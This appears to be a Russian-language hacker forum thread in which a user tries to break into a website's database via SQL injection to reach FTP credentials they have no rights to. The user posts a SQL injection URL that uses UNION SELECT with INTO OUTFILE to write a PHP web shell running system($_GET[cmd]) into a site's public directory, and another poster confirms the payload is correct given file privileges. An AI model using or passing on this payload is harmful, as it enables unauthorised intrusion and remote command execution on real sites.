Я нашел таблицу для фтп доступа к сайту и у меня нет прав на ее прочтение. Есть же таблица User_privileges, можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection? Заранее спасибо :)

Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов

Мдам, спасибо =)

А вот, я правильно создаю шелл:
http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE+'/users/hotels/public_html/shell.php'/*

Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов
Пи*дец, думай хоть немного когда пишешь.
можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection?
Технически да, практически нет. Даже если для ремоут юзера разрешён update, то в субд mysql ничего не получится сделать, т.к. отсутствует поддержка подзапросов.
А вот, я правильно создаю шелл:
http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE+'/users/hotels/public_html/shell.php'/*
Ну если есть file_priv и файл создаётся, то правильно.

Нет там file_priv и файл не создается. Значит - не судьба =)